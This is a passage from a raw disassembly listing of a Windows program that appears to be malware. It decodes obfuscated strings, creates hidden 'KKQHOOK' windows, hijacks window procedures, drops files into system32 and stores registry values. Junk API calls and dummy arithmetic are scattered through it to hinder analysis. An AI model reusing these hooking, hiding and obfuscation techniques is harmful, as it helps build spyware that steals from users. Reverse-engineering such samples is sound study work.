; sub_408BE4+FB�j
pop edi
pop esi
pop ebx
leave
retn
sub_408BE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408DEF proc near ; CODE XREF: sub_408E89+27�p
; sub_408E89+41�p ...
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_1000 = byte ptr -1000h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1008h
call sub_40C498
push esi
push edi
call sub_40C598 ; GetTickCount
push 5
push [ebp+arg_0]
call sub_40C790 ; GetWindow
mov edi, eax
mov esi, 60E9h
mov eax, 7C4Ah
mul esi
mov [ebp+var_1008], eax
mov esi, eax
loc_408E23: ; CODE XREF: sub_408DEF+94�j
or edi, edi
jnz short loc_408E2B
xor eax, eax
jmp short loc_408E85
; ---------------------------------------------------------------------------
loc_408E2B: ; CODE XREF: sub_408DEF+36�j
push 0FFFh
lea eax, [ebp+var_1000]
push eax
push edi
call sub_40C79C ; GetClassNameA
mov [ebp+var_1], 27h
add [ebp+var_1], 1
mov eax, 0Dh
sub eax, dword_43B098
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1000]
push eax
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408E6E
mov eax, edi
jmp short loc_408E85
; ---------------------------------------------------------------------------
loc_408E6E: ; CODE XREF: sub_408DEF+79�j
mov eax, dword_445ACB
mov [ebp+var_1004], eax
push 2
push edi
call sub_40C790 ; GetWindow
mov edi, eax
jmp short loc_408E23
; ---------------------------------------------------------------------------
loc_408E85: ; CODE XREF: sub_408DEF+3A�j
; sub_408DEF+7D�j
pop edi
pop esi
leave
retn
sub_408DEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E89 proc near ; CODE XREF: sub_40B143+1F3�p
var_174 = dword ptr -174h
var_16F = byte ptr -16Fh
var_169 = byte ptr -169h
var_168 = dword ptr -168h
var_163 = byte ptr -163h
var_162 = byte ptr -162h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_152 = word ptr -152h
var_150 = byte ptr -150h
var_148 = byte ptr -148h
var_140 = word ptr -140h
var_13E = byte ptr -13Eh
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_129 = byte ptr -129h
var_128 = dword ptr -128h
var_122 = word ptr -122h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 174h
push ebx
push esi
push edi
mov eax, dword_445ACF
mov [ebp+var_138], eax
push 9
push offset aST ; ""
call sub_40129C
push eax
push [ebp+arg_0]
call sub_408DEF
mov ebx, eax
call sub_40C538 ; RtlGetLastWin32Error
push 8
push offset aS ; ""
call sub_40129C
push eax
push ebx
call sub_408DEF
mov ds:dword_41C950, eax
call sub_40C598 ; GetTickCount
push 0
push ds:dword_41C950
call sub_40C880 ; ShowWindow
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_112]
push eax
push ebx
call sub_40C778 ; GetWindowRect
push 0
push ds:dword_41DA84
push 0
push ebx
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_446605
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_40C88C ; CreateWindowExA
mov ds:dword_41EB84, eax
call sub_40C598 ; GetTickCount
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_158], eax
push 19h
push offset aZnnnNiG ; "ÍɃ"
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 30h
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43B098
add edi, 8
push edi
mov edi, dword_43B094
add edi, 12h
push edi
push 50800000h
push eax
mov edi, [ebp+var_158]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_41C94C, eax
call sub_40C514 ; GetCurrentThreadId
push 6
push offset word_445EF6
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 120h
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43B098
add edi, 45h
push edi
mov edi, dword_43B098
add edi, 8
push edi
push 50800009h
push offset byte_446605
push eax
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_42FCF8, eax
call sub_40C514 ; GetCurrentThreadId
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
mov eax, 14h
sub eax, dword_43B098
push eax
mov eax, dword_43B094
add eax, 12h
push eax
call sub_40C8F8 ; CreateFontA
mov [ebp+var_134], eax
call sub_40C634 ; IsDebuggerPresent
push 1
push [ebp+var_134]
push 30h
push ds:dword_41C94C
call sub_40C85C ; SendMessageA
call sub_40C5A4 ; GetVersion
push 8
push offset byte_445ED3
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B098
add edi, 120h
push edi
mov edi, dword_43B094
add edi, 30h
push edi
mov edi, dword_43B098
add edi, 2Eh
push edi
mov edi, dword_43B098
add edi, 8
push edi
push 50800003h
push offset byte_446605
push eax
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_431D04, eax
call sub_40C508 ; GetCurrentProcessId
push 8
push offset byte_445ED3
call sub_40129C
add esp, 48h
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B098
add edi, 120h
push edi
mov edi, dword_43B098
add edi, 30h
push edi
mov edi, dword_43B098
add edi, 2Eh
push edi
mov edi, dword_43B098
add edi, 46h
push edi
push 50800003h
push offset byte_446605
push eax
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_41DA7C, eax
call sub_40C598 ; GetTickCount
mov [ebp+var_2], 1
jmp loc_409219
; ---------------------------------------------------------------------------
loc_409155: ; CODE XREF: sub_408E89+397�j
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_169]
lea esi, aXola ; "xOLa%"
mov ecx, 3
rep movsw
lea edi, [ebp+var_16F]
lea esi, a6s7P ; "6S7+P"
mov ecx, 3
rep movsw
push 4
push offset aIgq ; ""
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CA30
lea eax, [ebp+var_162]
push eax
push 0
push 143h
push ds:dword_431D04
call sub_40C85C ; SendMessageA
push 6
push offset aQaigq ; ""
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CA30
add esp, 28h
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_162]
push eax
push 0
push 143h
push ds:dword_41DA7C
call sub_40C85C ; SendMessageA
mov [ebp+var_163], 0E9h
movzx eax, [ebp+var_163]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_163], al
inc [ebp+var_2]
loc_409219: ; CODE XREF: sub_408E89+2C7�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_409155
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_15C], eax
push 10h
push offset word_445EB6
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 4
push edi
mov edi, dword_43B098
add edi, 5Bh
push edi
mov edi, dword_43B098
add edi, 62h
push edi
mov edi, dword_43B098
add edi, 0B7h
push edi
push 50000000h
push eax
mov edi, [ebp+var_15C]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_413F70, eax
mov [ebp+var_118], 5002h
add [ebp+var_118], 127Fh
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_160], eax
push 0Fh
push offset aSN ; "Í"
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B098
add edi, 4Bh
push edi
mov edi, dword_43B098
add edi, 85h
push edi
mov edi, dword_43B094
add edi, 0C1h
push edi
push 50000000h
push eax
mov edi, [ebp+var_160]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_431CFC, eax
push 6
push offset word_445EF6
call sub_40129C
mov [ebp-164h], eax
push 0Ch
push offset byte_445E99
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B094
add edi, 54h
push edi
mov edi, dword_43B098
add edi, 0ADh
push edi
mov edi, dword_43B098
add edi, 0B7h
push edi
push 50000000h
push eax
mov edi, [ebp-164h]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_433FE4, eax
push 6
push offset word_445EF6
call sub_40129C
mov [ebp+var_168], eax
push 4Ah
push offset word_445E4E
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B094
add edi, 1E2h
push edi
mov edi, dword_43B098
add edi, 0DAh
push edi
mov edi, dword_43B098
add edi, 12h
push edi
push 50000000h
push eax
mov edi, [ebp+var_168]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_431D00, eax
call sub_40C538 ; RtlGetLastWin32Error
push 6
push offset word_445EF6
call sub_40129C
mov [ebp-16Ch], eax
push 26h
push offset byte_445E27
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B094
add edi, 0Eh
push edi
mov edi, dword_43B094
add edi, 0FBh
push edi
mov edi, dword_43B098
add edi, 0F3h
push edi
mov edi, dword_43B094
add edi, 1Ch
push edi
push 50000000h
push eax
mov edi, [ebp-16Ch]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_439328, eax
call sub_40C538 ; RtlGetLastWin32Error
lea edi, [ebp+var_13E]
lea esi, aAYI ; "A&y I"
mov ecx, 3
rep movsw
push offset byte_432F00
lea eax, [ebp+var_102]
push eax
call sub_40CA30
add esp, 58h
call sub_40C5A4 ; GetVersion
mov [ebp+var_3], 4
jmp short loc_4094CD
; ---------------------------------------------------------------------------
loc_4094BD: ; CODE XREF: sub_408E89+649�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_4094CD: ; CODE XREF: sub_408E89+632�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_4094BD
mov [ebp+var_11C], 78Fh
add [ebp+var_11C], 2437h
push 4
push offset word_445E22
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B094
add edi, 16h
push edi
mov edi, dword_43B098
mov esi, edi
add esi, 76h
push esi
add edi, 8
push edi
push edi
push 50800800h
lea edi, [ebp+var_102]
push edi
push eax
push 200h
call sub_40C88C ; CreateWindowExA
mov ds:dword_410848, eax
call sub_40C5A4 ; GetVersion
push 4
push offset word_445E22
call sub_40129C
push 0
push ds:dword_41DA84
push 0
push ds:dword_42FCF8
mov edi, dword_43B094
add edi, 16h
push edi
mov edi, dword_43B094
add edi, 44h
push edi
mov edi, dword_43B098
add edi, 53h
push edi
mov edi, dword_43B098
add edi, 8
push edi
push 50800000h
push offset byte_446605
push eax
push 200h
call sub_40C88C ; CreateWindowExA
mov ds:dword_41DA74, eax
call sub_40C598 ; GetTickCount
push 0
push 78h
push 0CCh
push ds:dword_41DA74
call sub_40C85C ; SendMessageA
push 6
push offset byte_445E1B
call sub_40129C
mov [ebp-170h], eax
push 16h
push offset dword_445E04
call sub_40129C
add esp, 20h
push 0
push ds:dword_41DA84
push 0
push ds:dword_41EB84
mov edi, dword_43B098
add edi, 0Bh
push edi
mov edi, dword_43B098
add edi, 8Fh
push edi
mov edi, dword_43B098
add edi, 134h
push edi
mov edi, dword_43B098
add edi, 12h
push edi
push 50800000h
push eax
mov edi, [ebp-170h]
push edi
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_433FE8, eax
call sub_40C574 ; GetProcessHeap
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
mov eax, dword_43B094
add eax, 4
push eax
mov eax, dword_43B098
add eax, 4
push eax
call sub_40C8F8 ; CreateFontA
mov ebx, eax
push 1
push ebx
push 30h
push ds:dword_431D04
call sub_40C85C ; SendMessageA
mov ax, word_445AE5
mov [ebp+var_140], ax
push 1
push ebx
push 30h
push ds:dword_41DA7C
call sub_40C85C ; SendMessageA
call sub_40C508 ; GetCurrentProcessId
push 1
push ebx
push 30h
push ds:dword_410848
call sub_40C85C ; SendMessageA
push 1
push ebx
push 30h
push ds:dword_41DA74
call sub_40C85C ; SendMessageA
push 1
push ebx
push 30h
push ds:dword_431CFC
call sub_40C85C ; SendMessageA
lea edi, [ebp+var_148]
lea esi, aDvybtb ; " dyTB"
movsd
movsd
push 1
push ebx
push 30h
push ds:dword_413F70
call sub_40C85C ; SendMessageA
mov [ebp+var_120], 1931h
add [ebp+var_120], 340Ch
push 1
push ebx
push 30h
push ds:dword_433FE4
call sub_40C85C ; SendMessageA
lea edi, [ebp+var_150]
lea esi, byte_445AEF
mov ecx, 2
rep movsd
push 1
push ebx
push 30h
push ds:dword_433FE8
call sub_40C85C ; SendMessageA
push 0FFFFFFFCh
push ds:dword_431D04
call sub_40C808 ; GetWindowLongA
mov ds:dword_41EA7C, eax
call sub_40C598 ; GetTickCount
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_431D04
call sub_40C814 ; SetWindowLongA
mov [ebp+var_122], 0B3Bh
add [ebp+var_122], 6718h
push 0FFFFFFFCh
push ds:dword_41DA7C
call sub_40C808 ; GetWindowLongA
mov ds:dword_41DA78, eax
mov ebx, 90Dh
mov eax, ebx
add eax, ebx
mov ebx, eax
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_41DA7C
call sub_40C814 ; SetWindowLongA
mov [ebp+var_128], 5EE2h
mov eax, 7823h
mul [ebp+var_128]
mov [ebp+var_174], eax
mov [ebp+var_128], eax
push 0FFFFFFFCh
push ds:dword_410848
call sub_40C808 ; GetWindowLongA
mov ds:dword_40E008, eax
mov [ebp+var_129], 0B8h
add [ebp+var_129], 0CCh
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_410848
call sub_40C814 ; SetWindowLongA
call sub_40C634 ; IsDebuggerPresent
push 0FFFFFFFCh
push ds:dword_41DA74
call sub_40C808 ; GetWindowLongA
mov ds:dword_413F6C, eax
mov [ebp+var_130], 5F75h
inc [ebp+var_130]
push offset sub_40B01B
push 0FFFFFFFCh
push ds:dword_41DA74
call sub_40C814 ; SetWindowLongA
call sub_40C5A4 ; GetVersion
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
mov ax, word_445AF7
mov [ebp+var_152], ax
pop edi
pop esi
pop ebx
leave
retn
sub_408E89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_409847 proc near ; DATA XREF: sub_40A766+80D�o
var_55FD = byte ptr -55FDh
var_55FC = dword ptr -55FCh
var_55F7 = byte ptr -55F7h
var_55F4 = word ptr -55F4h
var_55F1 = byte ptr -55F1h
var_55F0 = dword ptr -55F0h
var_55EA = byte ptr -55EAh
var_474C = dword ptr -474Ch
var_4746 = dword ptr -4746h
var_4742 = byte ptr -4742h
var_473F = byte ptr -473Fh
var_4737 = byte ptr -4737h
var_4736 = byte ptr -4736h
var_472F = byte ptr -472Fh
var_4727 = byte ptr -4727h
var_4720 = dword ptr -4720h
var_471C = word ptr -471Ch
var_4719 = byte ptr -4719h
var_4718 = word ptr -4718h
var_4716 = word ptr -4716h
var_4714 = dword ptr -4714h
var_470F = byte ptr -470Fh
var_470E = word ptr -470Eh
var_470B = byte ptr -470Bh
var_470A = word ptr -470Ah
var_4707 = byte ptr -4707h
var_4608 = byte ptr -4608h
var_4604 = dword ptr -4604h
var_4600 = dword ptr -4600h
var_45FC = dword ptr -45FCh
var_45F5 = byte ptr -45F5h
var_45F4 = dword ptr -45F4h
var_45EF = byte ptr -45EFh
var_45EB = byte ptr -45EBh
var_35FD = byte ptr -35FDh
var_35FA = word ptr -35FAh
var_35F8 = dword ptr -35F8h
var_35F4 = word ptr -35F4h
var_35F2 = word ptr -35F2h
var_35F0 = dword ptr -35F0h
var_35EC = dword ptr -35ECh
var_35E5 = byte ptr -35E5h
var_35E0 = word ptr -35E0h
var_35DE = byte ptr -35DEh
var_35D8 = byte ptr -35D8h
var_35D3 = byte ptr -35D3h
var_25D4 = byte ptr -25D4h
var_25CF = byte ptr -25CFh
var_15E4 = dword ptr -15E4h
var_15E0 = dword ptr -15E0h
var_15DC = dword ptr -15DCh
var_15D8 = dword ptr -15D8h
var_15D4 = dword ptr -15D4h
var_15D0 = dword ptr -15D0h
var_117A = byte ptr -117Ah
var_1174 = byte ptr -1174h
var_116C = byte ptr -116Ch
var_1167 = byte ptr -1167h
var_1160 = byte ptr -1160h
var_1159 = byte ptr -1159h
var_1153 = byte ptr -1153h
var_114C = dword ptr -114Ch
var_1148 = word ptr -1148h
var_1146 = byte ptr -1146h
var_113F = byte ptr -113Fh
var_1138 = word ptr -1138h
var_1136 = byte ptr -1136h
var_1133 = byte ptr -1133h
var_1034 = dword ptr -1034h
var_102D = byte ptr -102Dh
var_102C = dword ptr -102Ch
var_1028 = word ptr -1028h
var_1026 = word ptr -1026h
var_1024 = word ptr -1024h
var_1022 = word ptr -1022h
var_1020 = word ptr -1020h
var_101D = byte ptr -101Dh
var_101C = word ptr -101Ch
var_1019 = byte ptr -1019h
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_100F = byte ptr -100Fh
var_F0B = byte ptr -0F0Bh
var_E0C = dword ptr -0E0Ch
var_E08 = byte ptr -0E08h
var_608 = dword ptr -608h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_200 = byte ptr -200h
var_1FD = byte ptr -1FDh
var_1FB = byte ptr -1FBh
var_1A8 = byte ptr -1A8h
var_1A7 = byte ptr -1A7h
push ebp
mov ebp, esp
mov eax, 5600h
call sub_40C498
push ebx
push esi
push edi
lea edi, [ebp+var_1136]
lea esi, byte_445AF9
mov ecx, 3
rep movsb
mov ax, word_445AFC
mov [ebp+var_1138], ax
lea edi, [ebp+var_113F]
lea esi, aXeXw7 ; "xe#xW7"
mov ecx, 7
rep movsb
lea edi, [ebp+var_1146]
lea esi, aSZtw ; "s* ztw"
mov ecx, 7
rep movsb
mov ax, word_445B0C
mov [ebp+var_1148], ax
mov eax, dword_445B0E
mov [ebp+var_114C], eax
call sub_40C598 ; GetTickCount
push eax
call sub_40CA3C
pop ecx
mov [ebp+var_1020], 5EBBh
movzx eax, [ebp+var_1020]
imul eax, 4F0Ch
mov [ebp+var_1020], ax
loc_4098DE: ; CODE XREF: sub_409847+EB1�j
lea edi, [ebp+var_1153]
lea esi, aMc_o9 ; " MC_O9"
mov ecx, 7
rep movsb
mov eax, 14h
sub eax, dword_43B098
push eax
lea eax, [ebp+var_F0B]
push eax
call sub_40170F
mov [ebp+var_1022], 7892h
add [ebp+var_1022], 627Dh
push 9
push offset word_445DFA
call sub_40129C
lea edi, [ebp+var_F0B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA30
mov [ebp+var_1019], 0CDh
movzx eax, [ebp+var_1019]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1019], al
lea eax, [ebp+var_600]
push eax
call sub_403449
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_1159]
lea esi, aV?zP ; "v?Z,P"
mov ecx, 3
rep movsw
push 9
push offset aCvvi ; "ݗ"
call sub_40129C
mov edi, dword_43B0B4
push off_43B0BC[edi*4]
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40CA30
call sub_40C508 ; GetCurrentProcessId
push 1
push offset aV ; ""
call sub_40129C
mov edi, 0Dh
sub edi, dword_43B098
push edi
push eax
mov edi, dword_43B0B4
push off_43B0BC[edi*4]
call sub_401806
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_4099FB
push 0Ah
push offset aVG ; "ƃ"
call sub_40129C
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40CA54
add esp, 10h
loc_4099FB: ; CODE XREF: sub_409847+196�j
mov [ebp+var_1024], 318Dh
add [ebp+var_1024], 466Ah
and [ebp+var_1018], 0
mov [ebp+var_1034], 4
call sub_40C574 ; GetProcessHeap
push 1Ah
push offset dword_445DC8
call sub_40129C
mov [ebp+var_15D0], eax
push 3
push offset asc_445DC4 ; ""
call sub_40129C
lea edi, [ebp+var_1160]
push edi
lea edi, [ebp+var_1034]
push edi
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15D0]
push edi
push 80000001h
call sub_4014BD
lea edi, [ebp+var_1167]
lea esi, a9yb ; "9y|'&"
mov ecx, 7
rep movsb
lea edi, [ebp+var_116C]
lea esi, aRlJ ; "Rl J"
mov ecx, 5
rep movsb
push 7
push offset aTRi ; "ΐ"
call sub_40129C
push [ebp+var_1018]
push eax
lea edi, [ebp+var_1133]
push edi
call sub_40CA30
mov [ebp+var_1026], 7CB6h
sub [ebp+var_1026], 556Ch
lea eax, [ebp+var_1133]
push eax
lea eax, [ebp+var_E08]
push eax
call sub_40CA54
lea edi, [ebp+var_1174]
lea esi, aMe0AP ; "Me0/&P"
movsd
movsd
push 1
push offset asc_445DBA ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_E08]
push edi
push 0
call sub_4062CD
add esp, 6Ch
mov ebx, eax
call sub_40C574 ; GetProcessHeap
or ebx, ebx
jnz short loc_409B4A
lea edi, [ebp+var_15D8]
lea esi, a@_aP1 ; " @_a&P1"
mov ecx, 2
rep movsd
lea eax, [ebp+var_600]
push eax
call sub_4034D8
pop ecx
call sub_40C5A4 ; GetVersion
jmp loc_40A5BF
; ---------------------------------------------------------------------------
loc_409B4A: ; CODE XREF: sub_409847+2D7�j
and [ebp+var_1018], 0
push 1Ah
push offset dword_445DC8
call sub_40129C
mov [ebp+var_15D4], eax
push 3
push offset asc_445DC4 ; ""
call sub_40129C
push 4
push 4
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15D4]
push edi
push 80000001h
call sub_4015EB
mov [ebp+var_1028], 5BFEh
inc [ebp+var_1028]
push 0
lea eax, [ebp+var_600]
push eax
call sub_401A36
add esp, 30h
mov [ebp+var_E0C], eax
or eax, eax
jz loc_40A5BF
lea eax, [ebp+var_600]
push eax
call sub_40C760 ; DeleteFileA
lea eax, [ebp+var_600]
push eax
call sub_4034D8
pop ecx
call sub_40C574 ; GetProcessHeap
and [ebp+var_608], 0
jmp loc_40A56A
; ---------------------------------------------------------------------------
loc_409BE5: ; CODE XREF: sub_409847+D46�j
call sub_40C5A4 ; GetVersion
cmp [ebp+var_200], 0
jz loc_40A56A
call sub_40C5A4 ; GetVersion
lea ecx, [ebp+var_200]
or eax, 0FFFFFFFFh
loc_409C05: ; CODE XREF: sub_409847+3C3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409C05
cmp eax, 5Ch
jb loc_40A56A
lea edi, [ebp+var_35D8]
lea esi, aLLe ; "L LE"
mov ecx, 5
rep movsb
mov [ebp+var_1A8], 0
lea edi, [ebp+var_35DE]
lea esi, a8bd3 ; "*8bd3"
mov ecx, 3
rep movsw
push 0FFFh
lea eax, [ebp+var_25D4]
push eax
lea eax, [ebp+var_1A7]
push eax
call sub_408A95
mov ax, word_445B46
mov [ebp+var_35E0], ax
push 0FFFh
lea eax, [ebp+var_35D3]
push eax
lea eax, [ebp+var_200]
push eax
call sub_408A95
add esp, 18h
lea edi, [ebp+var_35E5]
lea esi, aWxQ ; "WX$Q"
mov ecx, 5
rep movsb
mov byte ptr [ebp+var_15D8+2], 0
call sub_40C598 ; GetTickCount
mov byte ptr [ebp+var_15D8+3], 0
jmp short loc_409CC9
; ---------------------------------------------------------------------------
loc_409CAB: ; CODE XREF: sub_409847+49B�j
movzx eax, byte ptr [ebp+var_15D8+3]
lea edx, [ebp+eax+var_25D4]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add byte ptr [ebp+var_15D8+3], 1
loc_409CC9: ; CODE XREF: sub_409847+462�j
lea ecx, [ebp+var_25D4]
or eax, 0FFFFFFFFh
loc_409CD2: ; CODE XREF: sub_409847+490�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409CD2
movzx esi, byte ptr [ebp+var_15D8+3]
cmp esi, eax
jb short loc_409CAB
lea ecx, [ebp+var_25D4]
or eax, 0FFFFFFFFh
loc_409CED: ; CODE XREF: sub_409847+4AB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409CED
lea esi, [ebp+var_35D3]
push esi
push eax
lea edi, [ebp+var_25D4]
push edi
call sub_4088D5
add esp, 0Ch
mov [ebp+var_35EC], eax
call sub_40C514 ; GetCurrentThreadId
push 5
push offset aN ; "ٍ"
call sub_40129C
add esp, 8
mov edi, 3
sub edi, dword_43B094
push edi
push eax
lea edi, [ebp+var_25D4]
push edi
call sub_401806
add esp, 0Ch
cmp eax, 0
jnz loc_40A21B
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_4727]
lea esi, aYxC ; "yX>c ,"
mov ecx, 7
rep movsb
mov [ebp+var_470A], 2351h
inc [ebp+var_470A]
lea eax, [ebp+var_25CF]
push eax
lea eax, [ebp+var_45EF]
push eax
call sub_40C4B8
lea edi, [ebp+var_472F]
lea esi, aDdjrm ; "!ddJrm*"
mov ecx, 8
rep movsb
mov [ebp+var_35F0], 0
mov [ebp+var_45F4], 4
mov [ebp+var_470B], 2Bh
movzx eax, [ebp+var_470B]
imul eax, 40A3h
mov [ebp+var_470B], al
lea eax, [ebp+var_4608]
push eax
lea eax, [ebp+var_45F4]
push eax
lea eax, [ebp+var_35F0]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014BD
add esp, 18h
call sub_40C598 ; GetTickCount
push 1
push offset asc_445DBA ; ""
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_45EF]
push edi
push offset dword_41EA80
call sub_4062CD
add esp, 20h
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
cmp ebx, 0
jnz short loc_409E64
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 4
mov [ebp+var_474C], 3A1Ch
inc [ebp+var_474C]
jmp short loc_409EB1
; ---------------------------------------------------------------------------
loc_409E64: ; CODE XREF: sub_409847+5F5�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015EB
mov [ebp+var_45F5], 10h
movzx eax, [ebp+var_45F5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_45F5], al
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 1Ch
call sub_40C508 ; GetCurrentProcessId
loc_409EB1: ; CODE XREF: sub_409847+61B�j
and [ebp+var_35F0], 0
mov [ebp+var_45F4], 4
lea edi, [ebp+var_4736]
lea esi, aPYN ; " P'y&n"
mov ecx, 7
rep movsb
lea eax, [ebp+var_4608]
push eax
lea eax, [ebp+var_45F4]
push eax
lea eax, [ebp+var_35F0]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014BD
add esp, 18h
lea edi, [ebp+var_4737]
lea esi, byte_445B63
xor ecx, ecx
inc ecx
rep movsb
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_40E010
call sub_40C67C ; CreateFileA
mov [ebp+var_4600], eax
call sub_40C598 ; GetTickCount
push 0
push [ebp+var_4600]
call sub_40C520 ; GetFileSize
mov [ebp+var_4720], eax
mov [ebp+var_470E], 791Eh
sub [ebp+var_470E], 1754h
push [ebp+var_4600]
call sub_40C55C ; CloseHandle
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+var_4720]
cmp [ebp+var_35F0], eax
jb short loc_409F83
call sub_40C5A4 ; GetVersion
jmp loc_40A0AB
; ---------------------------------------------------------------------------
loc_409F83: ; CODE XREF: sub_409847+730�j
lea edi, [ebp+var_473F]
lea esi, a7Emen ; "7 EmEn;"
movsd
movsd
mov eax, 14h
sub eax, dword_43B098
push eax
lea eax, [ebp+var_4707]
push eax
call sub_40170F
call sub_40C634 ; IsDebuggerPresent
push 9
push offset word_445DAA
call sub_40129C
lea edi, [ebp+var_4707]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA30
mov [ebp+var_470F], 51h
movzx eax, [ebp+var_470F]
imul eax, 7CFBh
mov [ebp+var_470F], al
lea eax, [ebp+var_600]
push eax
call sub_403449
push 1
push offset asc_445DBA ; ""
call sub_40129C
